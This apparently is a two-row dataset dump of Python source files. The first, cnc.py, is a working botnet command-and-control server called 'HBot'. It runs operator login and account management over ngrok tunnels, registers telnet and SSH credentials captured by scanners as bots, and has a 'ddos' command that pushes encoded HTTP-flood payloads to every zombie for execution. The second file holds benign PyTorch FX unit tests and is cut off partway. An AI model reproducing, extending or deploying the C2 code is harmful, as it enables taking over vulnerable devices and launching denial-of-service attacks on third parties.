source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
cnc.py
|
from lib import network, database, console, tools
import threading, socket, random, time
from pyngrok import ngrok
class Master(threading.Thread):
def __init__(self, console: console.Console, color: console.Color, database: database.Database, socket_session: socket.socket, ip: str, port: int):
threading.Thread.__init__(self)
self.network = network.Network(socket_session, database)
self.database = database
self.console = console
self.color = color
self.port = port
self.ok = True
self.ip = ip
# Temp session storage
self.session_time = int(time.time())
self.login_attemp = 0
self.kicked_time = 0
self.username = None
self.password = None
self.logged = False
self.grade = None
def kill(self, reason: str, send: bool= False):
if self.ok:
if send:
self.send(reason)
if self in self.database.online_user:
self.database.online_user.remove(self)
self.console.print_info(f'{self.ip} -> master killed -> {reason}')
self.network.close_socket()
self.ok = False
def send(self, content: str):
if not self.network.send_packet(content):
self.kill('Error when send packet')
def bulk_send(self, packets: list):
if not self.network.bulk_send_packet(packets):
self.kill('Error when send packets list')
def recv(self, content: str= False):
if content:
self.send(content)
data = self.network.recv_packet()
if not data:
self.kill(f'Invalid data recieved')
return None
else:
return data
# Custom function
def set_title(self, title: str):
self.send(f'\033]0;HBot | {title}\007')
def clear_screen(self):
self.bulk_send([
'\033[2J\033[1H',
'',
f' {self.color.fade("╦.╦╔╗.╔═╗╔╦╗")}'.replace('.', f'{self.color.white}.'),
f' {self.color.fade("╠═╣╠╩╗║.║.║.")}'.replace('.', f'{self.color.white}.'),
f' {self.color.fade("╩.╩╚═╝╚═╝.╩.")}{self.color.reset}'.replace('.', f'{self.color.white}.'),
'\r'
])
def loop_thread(self):
while self.ok:
time.sleep(1)
if self.logged:
bd = self.database.get_network_bandwitch()
send_bd = bd.split('|')[0]
recv_bd = bd.split('|')[1]
self.set_title(f'User: {len(self.database.online_user)} | Bots: {len(self.database.online_zombie)} | Vuln: {self.database.total_ssh_bots + self.database.total_telnet_bots} | Loader: {len(self.database.online_loader)} | Command: {self.database.send_command} | Task: {self.database.send_task} | Packet: {send_bd} / {recv_bd}')
else:
self.kicked_time = int(time.time()) - self.session_time
self.set_title(f'Login page | Attemp: {self.login_attemp}/3 | Kicked on: {self.kicked_time}/30s')
if self.kicked_time >= 30:
self.kill('You did not connect in time !', True)
def login(self):
self.clear_screen()
while self.ok:
if self.login_attemp == 3:
self.kill('Max login attemp', True)
else:
self.login_attemp += 1
self.username = self.recv(f'{self.color.red}>{self.color.reset} Username{self.color.reset}: ')
self.password = self.recv(f'{self.color.red}>{self.color.reset} Password{self.color.reset}: ')
if self.database.user_valid(self.username, self.password):
self.grade = self.database.get_user(self.username)['grade']
self.logged = True
break
return self.logged
def prompt(self):
while self.ok:
cmd = self.recv(self.color.fade(f'\r{self.username}@HBot ~$ ').replace('@', f'{self.color.white}@') + self.color.white)
if not cmd:
return
self.database.send_command += 1
argument = cmd.split(' ')
command = argument[0]
# TODO: Show only avaiable commands and clean shit code
if command == 'help': # ・> | Rip eyes
table = self.console.raw_fade(self.console.get_custom_table(['📌 COMMAND', '📋 DESCRIPTION', '⭐ PERMISSION'], [
'clear\nmethod\nlist\ncreate_acc\ndelete_acc\nkill\nstats\nexit',
'Clean the screen\nSee attack methods\nSee connected users\nCreate an account\nDelete an account\nKick user from server\nShow cool stuff\nClose session',
'all\nall\nadmin\nroot\nroot\nroot\nall\nall'
]))
self.bulk_send(table)
elif command == 'exit':
self.kill('Goobye <3', True)
elif command == 'stats':
bd = self.database.get_network_bandwitch()
send_bd = bd.split('|')[0]
recv_bd = bd.split('|')[1]
self.bulk_send(self.console.bulk_fade([
f'\n> Account informations:',
f' - Username: {self.username}',
f' - Grade: {self.grade}',
f'\n> Connected device:',
f' - Loader: {len(self.database.online_loader)}',
f' - Zombie: {len(self.database.online_zombie)}/{self.database.total_telnet_bots + self.database.total_ssh_bots}',
f' - User: {len(self.database.online_user)}',
f'\n> Trafic:',
f' - Total recieved packet: {self.database.recv_packet} ({recv_bd})',
f' - Total sent packet: {self.database.send_packet} ({send_bd})',
f' - Command send: {self.database.send_command}',
f' - Task send: {self.database.send_task}\n'
]))
elif command == 'clear':
self.clear_screen()
elif command == 'method':
table = self.console.raw_fade(self.console.get_simple_table('METHOD', '💥', ['http']))
self.bulk_send(table)
elif command == 'ddos':
if len(argument) < 4:
self.send('Bad syntax: ddos <method> <ip> <port> <time>\n')
else:
ip = argument[2]
port = argument[3]
timeout = argument[4]
method = argument[1]
for zombie in self.database.online_zombie:
zombie.ddos_payload(ip, port, timeout, method)
# Admin command
elif self.grade not in ['root', 'admin']:
self.send(f'You are not allowed to use an {self.color.yellow}Admin{self.color.reset} command !\n')
elif command == 'list':
data = []
for user in self.database.online_user:
data.append(f'User n°{self.color.magenta}{len(data) + 1}{self.color.reset} - Username: {self.color.yellow}{user.username}{self.color.reset} Grade: {self.color.green}{user.grade}{self.color.reset} Session-Time: {self.color.blue_m}{int(time.time()) - user.session_time}{self.color.reset}s')
self.bulk_send(data)
# Root command
elif self.grade not in ['root']:
self.send(f'You are not allowed to use an {self.color.yellow}Root{self.color.reset} command !\n')
# create_acc <user> <pass> <grade>
elif command == 'create_acc':
if len(argument) < 4:
self.send(f'Bad syntax: create_acc <{self.color.orange}username{self.color.reset}> <{self.color.red}password{self.color.reset}> <{self.color.yellow}grade{self.color.reset}>\n')
else:
if self.database.create_user(argument[1], argument[2], argument[3]):
self.send(f'The user has been successfully created\n')
elif command == 'delete_acc':
if len(argument) < 2:
self.send(f'Bad syntax: delete_acc <{self.color.orange}username{self.color.reset}>\n')
else:
result = self.database.delete_user(argument[1])
disconnected= 0
if result:
for user in self.database.online_user:
if user.username == argument[1]:
disconnected += 1
user.kill(f'Account was deleted by {self.username}', True)
self.send(f'The account has been successfully deleted, {disconnected} users have been kicked\n')
else:
self.send(f'Invalid account\n')
elif command == 'kill':
if len(argument) < 2:
self.send(f'Bad syntax: kill <{self.color.orange}username username1 username2{self.color.reset}>\n')
else:
disconnected= 0
for user in self.database.online_user:
if user.username in argument:
disconnected += 1
user.kill(f'Kicked by {self.username}', True)
self.send(f'{disconnected} users was successfully kicked\n')
def run(self):
threading.Thread(target= self.loop_thread).start()
if self.login():
self.database.online_user.append(self)
self.clear_screen()
self.bulk_send([
self.color.fade(f' ╔═══════════════════════════════════~'),
self.color.fade(' ║ ') + f'{self.color.reset}Welcome {self.color.underline}{self.color.white}{self.username}{self.color.reset}, Grade: {self.color.green}{self.grade}{self.color.reset}.',
self.color.fade(' ║ ') + f'{self.color.reset}Type "{self.color.magenta}help{self.color.reset}" to see commands and "{self.color.magenta}exit{self.color.reset}" to disconnect.',
self.color.fade(f' ╚═════════════════════════════════════════════════════~\n'),
])
self.prompt()
class Loader(threading.Thread):
def __init__(self, console: console.Console, database: database.Database, socket_session: socket.socket, ip: str, port: int, http_port: int):
threading.Thread.__init__(self)
self.network = network.Network(socket_session, database)
self.http_port = http_port
self.database = database
self.console = console
self.port = port
self.ok = True
self.ip = ip
# Temp session storage
self.session_time = int(time.time())
def kill(self, reason: str, send: bool= False):
if self.ok:
if send:
self.send(reason)
if self in self.database.online_loader:
self.database.online_loader.remove(self)
self.console.print_info(f'{self.ip} -> loader killed -> {reason}')
self.network.close_socket()
self.ok = False
def send(self, content: str):
if not self.network.send_packet(content):
self.kill('Error when send packet')
def recv(self, content: str= False):
if content:
self.send(content)
data = self.network.recv_packet()
if not data:
self.kill('Invalid data recieved')
return None
else:
return data
def loop_thread(self):
while self.ok:
time.sleep(60)
self.send('ping')
def run(self):
network.FileServer(self.http_port).start()
threading.Thread(target= self.loop_thread).start()
self.database.online_loader.append(self)
while self.ok:
data = self.recv(False)
if data == None:
return
if '|' in data:
argument = data.split('|')
req_type = argument[0]
# scan|127.0.0.1|23|user|pass|telnet
if req_type == 'scan':
ip = argument[1]
port = argument[2]
username = argument[3]
password = argument[4]
device_type = argument[5]
# Due to bug :c,
if device_type == 'telnetscan':
device_type = 'telnet'
count = self.database.create_bot(username, password, ip, port, device_type)
if device_type == 'telnet':
self.database.total_telnet_bots = count
else:
self.database.total_ssh_bots = count
self.console.print_success(f'{self.ip} -> New {device_type} bot "{username}:{password} {ip}:{port}" -> {count} bots')
class Zombie(threading.Thread):
def __init__(self, console: console.Console, database: database.Database, socket_session: socket.socket, ip: str, port: int):
threading.Thread.__init__(self)
self.network = network.Network(socket_session, database)
self.database = database
self.console = console
self.port = port
self.ok = True
self.ip = ip
# Temp session storage
self.session_time = int(time.time())
def kill(self, reason: str, send: bool= False):
if self.ok:
if send:
self.send(reason)
if self in self.database.online_zombie:
self.database.online_zombie.remove(self)
self.console.print_info(f'{self.ip} -> zombie killed -> {reason}')
self.network.close_socket()
self.ok = False
def send(self, content: str):
if not self.network.send_packet(content):
self.kill('Error when send packet')
def recv(self, content: str= False):
if content:
self.send(content)
data = self.network.recv_packet()
if not data:
self.kill('Invalid data recieved')
return None
else:
return data
def loop_thread(self):
while self.ok:
time.sleep(60)
self.send('ping')
def ddos_payload(self, ip: str, port: str, timeout: str, type: str):
if type == 'http':
payload = tools.Encoder().base_64(str(open('./payload/http_flood.py', 'r+').read().replace('!ip!', ip).replace('!port!', port).replace('!time!', timeout)).encode())
elif type == 'test':
payload = tools.Encoder().base_64(str(open('./payload/test_flood.py', 'r+').read().replace('!ip!', ip).replace('!port!', port).replace('!time!', timeout)).encode())
self.send(f'run|{payload}')
def run(self):
threading.Thread(target= self.loop_thread).start()
self.database.online_zombie.append(self)
# Rip this part, anyone optimize ?
class Handler(threading.Thread):
def __init__(self, database: database.Database, console: console.Console, color: console.Color):
threading.Thread.__init__(self)
self.database = database
self.console = console
self.color = color
def master_thread(self, port: int, url: str):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', port))
self.console.print_success(f'Master -> online -> port: {port} -> url {url}')
while True:
sock.listen(1000)
(socket_session, (ip, port)) = sock.accept()
Master(self.console, self.color, self.database, socket_session, ip, port).start()
def loader_thread(self, port: int, url: str, http_port: int, http_url: str):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', port))
self.console.print_success(f'Loader -> online -> port: {port} -> url {url}')
self.console.print_success(f'File Server -> online -> port: {http_port} -> url {http_url}')
while True:
sock.listen(1000)
(socket_session, (ip, port)) = sock.accept()
Loader(self.console, self.database, socket_session, ip, port, http_port).start()
def zombie_thread(self, port: int, url: str):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', port))
self.console.print_success(f'Zombie -> online -> port: {port} -> url {url}')
while True:
sock.listen(1000)
(socket_session, (ip, port)) = sock.accept()
Zombie(self.console, self.database, socket_session, ip, port).start()
def run(self):
# Rip shit code btw
mp = random.randint(1500, 30000)
lp = random.randint(30001, 55000)
zp = random.randint(55001, 60000)
hp = random.randint(60001, 65000)
ml = (ngrok.connect(mp, 'tcp').public_url).split('://')[1]
ll = (ngrok.connect(lp, 'tcp').public_url).split('://')[1]
zl = (ngrok.connect(zp, 'tcp').public_url).split('://')[1]
hl = (ngrok.connect(hp, 'tcp').public_url).split('://')[1]
threading.Thread(target= self.master_thread, args= (mp, ml,)).start()
threading.Thread(target= self.loader_thread, args= (lp, ll, hp, hl)).start()
threading.Thread(target= self.zombie_thread, args= (zp, zl,)).start()
if __name__ == '__main__':
Database = database.Database('mongodb+srv://....')
Console = console.Console()
Color = console.Color()
Console.cnc_banner()
Handler(Database, Console, Color).start()
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import warnings
import unittest
from math import sqrt
from pathlib import Path
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH
import torch._C._fx
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from torch.fx.proxy import TraceError
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import run_tests, TEST_WITH_ROCM, IS_WINDOWS, IS_SANDCASTLE, IS_MACOS
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
# torchvision is an optional dependency; tests that need it are skipped when absent.
try:
    from torchvision import models as torchvision_models
    HAS_TORCHVISION = True
except ImportError:
    HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
    """Tiny tracing fixture: ReLU applied to a shifted input."""

    def forward(self, x):
        shifted = x + 3.0
        return torch.relu(shifted)
def a_non_torch_leaf(a, b):
    """Plain Python addition; used as a non-torch call_function target in hand-built graphs."""
    return a + b
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
    """Leaf registered with fx.wrap (by name): sum of a two-element pair plus a scalar."""
    pair_sum = a[0] + a[1]
    return pair_sum + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
    """Leaf registered with fx.wrap (by function object): sum of a pair plus a scalar."""
    pair_sum = a[0] + a[1]
    return pair_sum + b
# Register a_lifted_leaf2 by function object and the builtin len as traceable leaves.
wrap(a_lifted_leaf2)
wrap('len')
@wrap
def wrapped_via_decorator(a):
    """Leaf registered via the decorator form of fx.wrap; returns its input plus one."""
    increment = 1
    return a + increment
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
    """Wrapped leaf that receives an nn.Module argument and applies it to x."""
    return batchnorm1d(x)
# Keep references to the original function objects so tests can assert that
# fx.wrap does not rebind the module-level names.
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
    """Wrapped leaf calling a nonexistent torch attribute.

    NOTE(review): torch.foo does not exist — presumably this function is only ever
    symbolically traced, never executed; verify against its uses elsewhere in the suite.
    """
    return torch.foo(x)
# NamedTuple fixture for tests exercising traced code that returns named tuples.
class Pair(NamedTuple):
    x : torch.Tensor
    y : torch.Tensor
# for testing pytrees
class Foo(object):  # noqa: B209
    """Plain two-field container used by the pytree tests."""

    def __init__(self, a, b):
        self.a, self.b = a, b
class TestFX(JitTestCase):
def setUp(self):
    """Load the libtorchbind test library, except on platforms where it is unavailable."""
    if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
        return
    # Resolve the .so relative to the repository layout: <torch_root>/build/lib/...
    torch_root = Path(__file__).resolve().parent.parent
    p = torch_root / 'build' / 'lib' / 'libtorchbind_test.so'
    torch.ops.load_library(str(p))

def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
    """Check that an nn.Module's results match the GraphModule version
    for a given set of args/kwargs.
    """
    kwargs = kwargs if kwargs else {}
    ref_outs = m(*args, **kwargs)
    gm = symbolic_trace(m)
    # lint() validates graph well-formedness before execution.
    gm.graph.lint()
    test_outs = gm(*args, **kwargs)
    self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
    """Smoke-test symbolic_trace (and jit.script of the result) over modules with
    submodules, a wide operator mix, multiple outputs, varargs and kwargs."""
    class MySub(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.w = torch.nn.Parameter(torch.rand(4, 3))

        def forward(self, x):
            return self.w + x

    class MyModule(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.lin = torch.nn.Linear(4, 3)
            self.sub_mod = MySub()
            self.w = torch.nn.Parameter(torch.rand(3))

        def forward(self, A, B, c):
            t = torch.sigmoid(A) + self.lin(c)
            # Exercises .data access, floordiv, unary neg, and Tensor.add with alpha.
            return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))

    m = MyModule()
    gm = symbolic_trace(m)
    ms = torch.jit.script(gm)

    class M2(torch.nn.Module):
        def forward(self, A):
            m, idx = torch.max(A, 0)
            return m + 1, idx + 1

    m2 = M2()
    gm2 = symbolic_trace(m2)

    class T(torch.nn.Module):
        def forward(self, A, b=4, *args, c=5, **kwargs):
            x = A + 1 + args[0] + kwargs['3']
            return x

    t = T()
    symbolic_trace(t)

def test_custom_import(self):
    """A hand-built Graph whose call_function target is a non-torch free function."""
    graph = torch.fx.Graph()
    a = graph.placeholder('x')
    b = graph.placeholder('y')
    c = graph.call_function(a_non_torch_leaf, (a, b))
    d = graph.call_function(torch.sin, (c,))
    graph.output(d)
    gm = GraphModule(torch.nn.Module(), graph)
    x, y = torch.rand(1), torch.rand(1)
    self.assertEqual(torch.sin(x + y), gm(x, y))

def test_args_kwargs(self):
    """Trace a forward that consumes *args and **kwargs."""
    class T(torch.nn.Module):
        def forward(self, *args, **kwargs):
            x = args[0] + kwargs['foo']
            return x
    t = T()
    self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})

def test_args_kwargs_no_self(self):
    """self arriving via *args expansion is unsupported and must raise during tracing."""
    class T(torch.nn.Module):
        def forward(*args, **kwargs):  # noqa: B902
            self = args[0]
            return torch.relu(args[1])
    t = T()
    with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
        self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})

def test_fx_shifts(self):
    """Bit-shift operators are traceable and round-trip through a GraphModule."""
    class MyModule(torch.nn.Module):
        def forward(self, x):
            return x << 3, x >> 3

    input = torch.LongTensor(10).random_(0, 1024)

    m = MyModule()
    self.checkGraphModule(m, (input,))

def test_dict(self):
    """Dict inputs and dict-valued outputs are traceable."""
    class MyDictMod(torch.nn.Module):
        def forward(self, d):
            return d['3'].relu(), {'4' : d['3'].neg()}

    input_dict = {'3': torch.rand(3, 4)}
    m = MyDictMod()

    self.checkGraphModule(m, (input_dict,))
def test_disallow_override(self):
    """A custom Tracer can veto node creation — here any in-place op (name ending '_')."""
    # Custom delegate to disallow in-place tensor operations
    class NoMutableCallTracer(Tracer):
        def create_node(self, kind : str, target : Union[str, Callable],
                        args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
                        type_expr : Optional[Any] = None) -> Node:
            name = target if isinstance(target, str) else torch.typename(target)
            if name[-1] == '_':
                raise RuntimeError('In-place operations are not supported')
            return super().create_node(kind, target, args, kwargs, name)

    # Test method
    class MyInplaceMod(torch.nn.Module):
        def forward(self, x):
            x.add_(3.0)
            return x
    m = MyInplaceMod()
    with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
        NoMutableCallTracer().trace(m)

    # Test free function
    class MyInplaceMod2(torch.nn.Module):
        def forward(self, x):
            torch.log_(x)
            return x
    m2 = MyInplaceMod2()
    with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
        NoMutableCallTracer().trace(m2)

    # Test symbolic node as an arg
    class MyInplaceMod3(torch.nn.Module):
        def forward(self, x):
            y = torch.ones(3, 4)
            y.add_(x)
            return x
    m3 = MyInplaceMod3()
    with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
        NoMutableCallTracer().trace(m3)

def test_leaf_module(self):
    """With is_leaf_module() returning False, nn modules are traced through,
    so the resulting graph must contain no call_module nodes."""
    # Custom delegate to make it so that there are no leaf modules, everything
    # should get traced through
    class NoLeafModulesTracer(Tracer):
        def is_leaf_module(self, m, qualname):
            return False

    class MyReluMod(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.relu = torch.nn.ReLU()

        def forward(self, x):
            return self.relu(x)

    mrm = MyReluMod()
    sym = NoLeafModulesTracer().trace(mrm)
    for node in sym.nodes:
        self.assertNotEqual(node.op, 'call_module')
    sym.lint()
def test_wrap(self):
    """A leaf registered via wrap('name') appears as a call_function site in generated code."""
    self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))

    def to_trace(y):
        return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
    m = symbolic_trace(to_trace)
    self.assertIn('a_lifted_leaf', m.code)
    self.assertEqual(27, m(2))
    # wrap() must not rebind the module-level name.
    self.assertIs(a_lifted_leaf, real_a_lifed_leaf)

def test_wrap_fn_directly(self):
    """Same as test_wrap, but the leaf was registered by function object rather than name."""
    self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))

    def to_trace(y):
        return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
    m = symbolic_trace(to_trace)
    self.assertIn('a_lifted_leaf2', m.code)
    self.assertEqual(27, m(2))
    self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)

def test_wrapped_via_decorator(self):
    """The decorator form of wrap() traces as a leaf and leaves the function un-patched."""
    self.assertEqual(wrapped_via_decorator(0), 1)

    def to_trace(y):
        return wrapped_via_decorator(y)
    m = symbolic_trace(to_trace)
    self.assertIn('wrapped_via_decorator', m.code)
    self.assertEqual(m(0), 1)
    self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
    self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))

def test_wrap_with_submodule(self):
    """A wrapped leaf may take an nn.Module argument; results match a reference module."""
    class M(torch.nn.Module):
        def __init__(self):
            super(M, self).__init__()
            self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)

        def forward(self, x: torch.Tensor):
            return wrapped_with_submodule(x, self.batchnorm1d)

    m = symbolic_trace(M())

    self.assertIn("wrapped_with_submodule", m.code)

    input = torch.rand(3, 2)
    ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
    self.assertEqual(ref_batchnorm1d(input), m(input))

def test_wrapped_retrace(self):
    """Re-tracing an already-traced module preserves the wrapped call site."""
    def to_trace(y):
        return wrapped_via_decorator(y)
    m = symbolic_trace(to_trace)
    self.assertIn('wrapped_via_decorator', m.code)
    self.assertEqual(m(0), 1)

    retraced = symbolic_trace(m)
    self.assertIn('wrapped_via_decorator', retraced.code)
    self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
    """Copy a traced graph, then extend it with Proxy arithmetic before emitting output."""
    class M(torch.nn.Module):
        def forward(self, a, b):
            return a + b
    m = M()
    g = symbolic_trace(m).graph
    new_g = torch.fx.Graph()
    val_map : Dict[Node, Node] = {}
    output_val = new_g.graph_copy(g, val_map)
    t = Proxy(output_val)
    # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
    new_g.output((t + t).node)
    gm = GraphModule(m, new_g)
    gm.graph.lint()
    # (3 + 4) doubled by the appended t + t.
    self.assertEqual(gm(3, 4), 14)

def test_graph_unique_names(self):
    """After graph_copy + edits, every node name in the result must be unique."""
    class M(torch.nn.Module):
        def forward(self, a, b):
            return a + b
    m = M()
    g = symbolic_trace(m).graph
    new_g = torch.fx.Graph()
    val_map : Dict[Node, Node] = {}
    output_val = new_g.graph_copy(g, val_map)
    t = Proxy(output_val)
    # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
    new_g.output((t + t).node)
    gm = GraphModule(m, new_g)
    # NOTE(review): `Set` is not among the typing names imported at the top of this
    # chunk — verify it is imported elsewhere in the file.
    seen_names : Set[str] = set()
    for node in gm.graph.nodes:
        assert node.name not in seen_names
        seen_names.add(node.name)

def test_stack_traces(self):
    """With record_stack_traces enabled, every non-output node carries a stack trace."""
    class M(torch.nn.Module):
        def forward(self, a, b):
            return a + b

    tracer = torch.fx.Tracer()
    tracer.record_stack_traces = True

    graph = tracer.trace(M())
    for node in graph.nodes:
        if node.op == 'output':
            continue
        self.assertTrue(node.stack_trace is not None)
        assert 'test_fx.py' in node.stack_trace

def test_graph_unique_names_manual(self):
    """Manually-assigned colliding-ish names ('foo_1', 'foo_1_1') stay unique after copy."""
    graph : torch.fx.Graph = torch.fx.Graph()
    a : torch.fx.Node = graph.create_node('placeholder', 'x')
    b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
    c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
    d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
    graph.output(d)
    graph2 = torch.fx.Graph()
    val_map : Dict[Node, Node] = {}
    graph2.graph_copy(graph, val_map)
    # NOTE(review): `Set` is not among the typing names imported at the top of this
    # chunk — verify it is imported elsewhere in the file.
    seen_names : Set[str] = set()
    for node in graph2.nodes:
        assert node.name not in seen_names
        seen_names.add(node.name)

def test_unpack(self):
    """Tuple unpacking inside forward is traceable."""
    class M(torch.nn.Module):
        def forward(self, a, b):
            c, d = a
            return c + d + b

    a = (torch.rand(1), torch.rand(1))
    b = torch.rand(1)
    m = M()
    self.checkGraphModule(m, (a, b))
def test_native_callable(self):
    """End-to-end lowering of FX IR to a native (TorchBind) interpreter and back."""
    if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
        raise unittest.SkipTest("non-portable load_library call used in test")
    # This test exercises the case where we use FX to translate from Python
    # code to some native callable object
    #
    # For the purposes of testing, we use ElementwiseInterpreter defined
    # in test_custom_class.cpp.
    #
    # We test that we can
    # 1) Construct a native callable from FX IR
    # 2) Construct a drop-in replacement module that delegates to the
    #    native callable rather than the original code
    # 3) Run both the original code and native callable wrapper with
    #    equivalent results
    # 4) TorchScript compile the native callable wrapper and confirm
    #    equivalent results with the reference
    # 5) TorchScript serialize and deserialize the native callable
    #    and confirm equivalent results with the reference

    # We use this simple Module as a reference computation
    class MySimpleMod(torch.nn.Module):
        def forward(self, x):
            return 3.0 * x + x

    msm = MySimpleMod()

    # This is what a lowering pass might look like: a function that takes
    # a valid nn.Module, symbolically traces it, lowers the Module to some
    # representation, and wraps that representation up into another
    # nn.Module instance that handles dispatch to the compiled/lowered code.
    def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
        # ===== Stage 1: Symbolic trace the module =====
        mod = symbolic_trace(orig_mod)

        # ===== Stage 2: Lower GraphModule representation to the C++
        #       interpreter's instruction format ======
        instructions = []
        constant_idx = 0
        constants = {}
        fn_input_names = []

        target_to_name = {
            operator.add : "add",
            operator.mul : "mul"
        }

        output_node : Optional[Node] = None
        # For each instruction, create a triple
        # (instruction_name : str, inputs : List[str], output : str)
        # to feed into the C++ interpreter
        for n in mod.graph.nodes:
            target, args, out_name = n.target, n.args, n.name
            assert len(n.kwargs) == 0, "kwargs currently not supported"

            if n.op == 'placeholder':
                # Placeholders specify function argument names. Save these
                # for later when we generate the wrapper GraphModule
                fn_input_names.append(target)
            elif n.op == 'call_function':
                assert target in target_to_name, "Unsupported call target " + target
                arg_names = []
                for arg in args:
                    if not isinstance(arg, Node):
                        # Pull out constants. These constants will later be
                        # fed to the interpreter C++ object via add_constant()
                        arg_name = f'constant_{constant_idx}'
                        constants[arg_name] = torch.tensor(
                            [arg] if isinstance(arg, numbers.Number) else arg)
                        arg_names.append(arg_name)
                        constant_idx += 1
                    else:
                        arg_names.append(arg.name)
                instructions.append((target_to_name[target], arg_names, out_name))
            elif n.op == 'output':
                if output_node is not None:
                    raise RuntimeError('Multiple output nodes!')
                output_node = n
            else:
                raise RuntimeError('Unsupported opcode ' + n.op)

        interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
        # Load constants
        for k, v in constants.items():
            interpreter.add_constant(k, v)
        # Specify names for positional input arguments
        interpreter.set_input_names(fn_input_names)
        # Load instructions
        interpreter.set_instructions(instructions)
        # Specify name for single output
        assert isinstance(output_node.args[0], torch.fx.Node)
        interpreter.set_output_name(output_node.args[0].name)

        # ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
        class WrapperModule(torch.nn.Module):
            def __init__(self, interpreter):
                super().__init__()
                self.interpreter = interpreter

        wrapper = WrapperModule(interpreter)

        # Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
        # 3) Returns the speficied return value
        # FIXME: The following code could be greatly simplified by symbolic_trace'ing
        # the wrapper with a Tracer that considers the Wrapper instance a root
        # module, however, I can't get `__call__` exposed on TorchBind classes
        # without it messing up Python `hasattr` for some reason. More digging
        # into CPython's implementation of hasattr is probably in order...

        graph = torch.fx.Graph()
        # Add placeholders for fn inputs
        placeholder_nodes = []
        for name in fn_input_names:
            placeholder_nodes.append(graph.create_node('placeholder', name))

        # Get the interpreter object
        interpreter_node = graph.create_node('get_attr', 'interpreter')

        # Add a node to call the interpreter instance
        output_node = graph.create_node(
            op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))

        # Register output
        graph.output(output_node)

        graph.lint()

        # Return final GraphModule!!!
        return GraphModule(wrapper, graph)

    # Lower GraphModule to C++ interpreter
    lowered = lower_to_elementwise_interpreter(msm)

    # Compare correctness with original module
    x = torch.rand(3, 4)
    ref_out = msm(x)
    test_out = lowered(x)
    torch.testing.assert_allclose(test_out, ref_out)

    # Test TorchScript compilation
    scripted_lowered = torch.jit.script(lowered)
    script_out = scripted_lowered(x)
    torch.testing.assert_allclose(script_out, ref_out)

    # Test TorchScript ser/de
